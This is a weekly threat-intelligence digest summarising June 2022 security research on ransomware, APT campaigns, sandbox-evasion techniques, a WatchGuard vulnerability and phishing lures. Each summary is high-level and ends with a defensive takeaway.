Lockbit Ransomware Disguised as Copyright Claim E-mail Being Distributed

(published: June 24, 2022)

Background:

ASEC researchers have released their analysis of a recent phishing campaign, active since February 2022.

The campaign aims to infect users with Lockbit ransomware, using the pretense of a copyright claim as the phishing lure. The phishing email directs the recipient to open the attached zip file which contains a pdf of the infringed material. In reality, the pdf is a disguised NSIS executable which downloads and installs Lockbit.

The ransomware is installed onto the desktop for persistence through desktop change or reboot. Prior to data encryption, Lockbit will delete the volume shadow copy to prevent data recovery, in addition to terminating a variety of services and processes to avoid detection.

Takeaway:

Never click on suspicious attachments or run any executables from suspicious emails. Copyright infringement emails are a common phishing lure. Such emails will be straight forward to rectify if legitimate. If a copyright email is attempting to coerce you into opening attachments, such emails should be treated with extreme caution.

There is More Than One Way To Sleep: Deep Dive into the Implementations of API Hammering by Various Malware Families

(published: June 24, 2022)

Background:

Researchers at Palo Alto Networks have released their analysis of new BazarLoader and Zloader samples that utilize API Hammering as a technique to evade sandbox detection.

API Hammering makes use of a large volume of Windows API calls to delay the execution of malicious activity to trick sandboxes into thinking the malware is benign.

Whilst BazarLoader has utilized the technique in the past, this new variant creates large loops of benign API using a new process. Encoded registry keys within the malware are used for the calls and the large loop count is created from the offset of the first null byte of the first file in System32 directory.

Zloader uses a different form of API Hammering to evade sandbox detection. Hardcoded within Zloader are four large functions with many smaller functions within. Each function makes an input/output (I/O) call to mimic the behavior of many legitimate processes.

Takeaway:

Defense in depth is the best defense against sophisticated malware.

Malware Analysis Report (AR22-174A)

(published: June 23, 2022)

Background:

The Cybersecurity and Infrastructure Security Agency (CISA) have released a new malware analysis report on a malicious version of XMRIG Cryptominer which functions as a remote access trojan (RAT). The loader for the malware is only decrypted during execution, and is only executed within memory. C2 instructions for the RAT are received from a hardcoded ip address and always on port 443. Functionality for the RAT includes data exfiltration, desktop monitoring, keylogging, lateral movement and reverse shell access.

Takeaway:

Malware signatures are provided within the report; an up to date antivirus solution is a critical component of a robust defense in depth protection policy.

CVE-2022-31749: WatchGuard Authenticated Arbitrary File Read/Write (Fixed)

(published: June 23, 2022)

Background:

Researchers at Rapid7 have reported that as of 23rd of June, a patch had been released for an exploit they discovered, recorded as CVE-2022-31749.

The vulnerability allows users of a low privilege level of Watchguard Firebox or XTM users to read system files arbitrarily via argument injection if using SSH.

If using the diagnose or import pac commands, arguments can be passed to ftpput and ftpget commands bypassing credential authentication. Whilst it is still unconfirmed if remote code execution (RCE) is possible with this vulnerability, proof of concept exploitations have shown that the configd-hash.xml file can be exfiltrated, containing user password hashes.

Takeaway:

A patch management policy will ensure that critical systems and vulnerabilities are patched in a timely manner with minimal downtime. Always change standard passwords, as they are weak and their hashes can be reversed into usable passwords by threat actors easily if they are stolen.

Chinese Actor Takes Aim, Armed with Nim Language and Bizzaro AES

(published: June 22, 2022)

Background:

Checkpoint Researchers have identified a campaign of activity by a Chinese-speaking actor that is likely closely linked to the threat actor Tropic Trooper (PIRATE PANDA, APT23). Whilst the initial infection vector the group employs is unknown, the dropper being used after infection in this campaign is written in Nim and executes 2 instructions.

The first is to download a Mandarin based app named SMS Bomber, used to conduct DDOS attacks on phones, but additionally it injects some Shellcode into a notepad.exe process, effectively making SMS Bomber a trojanized app. The Shellcode contacts an obfuscated IP before downloading the Yahoyah trojan and TClient backdoor, both previously used by Tropic Trooper.

To disrupt analysis, strings that are usually encrypted with AES are instead encrypted with an inverted sequence of AES operations, resulting in an increase to researcher time to deobfuscate.

Takeaway:

A defense in depth approach to security is the best defense against APT groups.

Manage your threats more easily

Discover Prism

Avos Ransomware Group Expands with New Attack Arsenal

(published: June 21, 2022)

Background:

Cisco Talos researchers have documented the recent activity of Avos, a threat actor who is typically involved in Ransomware as a Service (RaaS) activities.

The threat actor maintains AvosLocker as the ransomware of choice. Whilst spam campaigns are often the initial infection vector, from late 2021 onward Avos was seen exploiting Log4j vulnerabilities for arbitrary code injection, specifically CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-44832.

Once the threat actors gain access to the victim’s machine, an encoded Powershell script is used to download AvosLocker. As of publication date, Avos is still operating on a RaaS model of operations.

Takeaway:

Critical vulnerabilities should be patched at the earliest possible opportunity to reduce the risk of exploitation. A patch management process should facilitate and oversee patch deployment to minimize downtime for vulnerable systems.

Unveiling an Unknown APT Actor Attacking High-Profile Entities in Europe and Asia

(published: June 21, 2022)

Background:

Kaspersky researchers have released their analysis of a new APT group dubbed ToddyCat.

Active since December 2020, ToddyCat has been linked to multiple campaigns exploiting ProxyLogon (CVE-2021-26855) to compromise Microsoft Exchange servers initially in Taiwan and Vietnam.

New countries they have targeted include Afghanistan, India, Indonesia, Iran, Kyrgyzstan, Malaysia, Pakistan, Russia, Slovakia, Thailand, United Kingdom and Uzbekistan.

Additionally, ToddyCat utilizes two unique, custom malware; a backdoor named Samurai and a trojan named Ninja. Samurai is a sophisticated backdoor operated on ports 80 and 443 and it allows for the deployment of additional malware (mostly Ninja) and lateral movement.

It features anti-analysis functionality, being heavily encrypted and using complicated switch cases to confuse instruction flow. Ninja is a powerful trojan that boasts functionality including file system management, process enumeration, multiple reverse shell sessions and arbitrary code injection.

Takeaway:

Patch management policies should be enforced to ensure that critical vulnerabilities are patched as soon as possible.

Russia’s APT28 Uses Fear of Nuclear War to Spread Follina Docs in Ukraine

(published: June 21, 2022)

Background:

Malwarebytes researchers have documented a new campaign by Russia-sponsored threat actor APT28 (Fancy Bear), utilizing Follina (CVE-2022-30190), a remote code execution vulnerability affecting Microsoft Support Diagnostic Tool (MSDT) to steal information.

Phishing emails were distributed that contain a Microsoft Word document whose contents were copied from an Atlantic Council article. The document contained an embedded Document.xml.rels to retrieve a HTML file which, in turn, executes an encoded Powershell Script. Once executed, a custom stealer is installed which targets usernames, passwords and urls on Chrome and Edge, and cookie data on Firefox. Stolen data is exfiltrated to a C2 domain using IMAP email protocol.

Takeaway:

Never open documents from suspicious emails. Fear is a common tactic to pressure victims into making a hasty decision, thus scare attempts to open attachments should be treated with a high degree of caution.

Client-Side Magecart Attacks Still Around, but More Covert

(published: June 20, 2022)

Background:

Research from Malwarebytes has detected a new wave of Magecart skimmers, which have been active since November 2021. These still function client side, but come with additional functionality. Variable names, once in plain text with names reflecting the data they contained, are now obfuscated to make analysis more difficult. Additionally, the skimmers check for the presence of a VM, stopping their execution if they detect a sandbox.

Takeaway:

Ensure endpoint security is up to date and security patches are installed in a timely manner to minimize the risk of skimmer injection. Monitor network traffic for strange behavior to detect possible C2 activity.

Microsoft 365 Credentials Targeted in New Fake Voicemail Campaign

(published: June 20, 2022)

Background:

ZScaler researchers have discovered a new phishing campaign targeting organizations within the US, specifically those within the Healthcare, Manufacturing, Military and Security Software industries.

The emails are routed through Japanese email services to spoof targeted organizations. Each phishing email contains a HTML attachment with a musical note inside the file text to masquerade as a voice note file. When opened, embedded Javascript within the file triggers, redirecting victims to a phishing site with a CAPTCHA security to feign legitimacy. Following this, a fake Microsoft login portal is presented that will steal any credentials entered.

Takeaway:

Never click on attachments from suspicious emails. Education is the best defense against phishing attacks. Always check the domain and url are correct before entering in any private or personal information. If you are logged in already, and you are asked to log in an additional time, it is a possible indicator that the website is illegitimate.

Manage your threats more easily

Discover Prism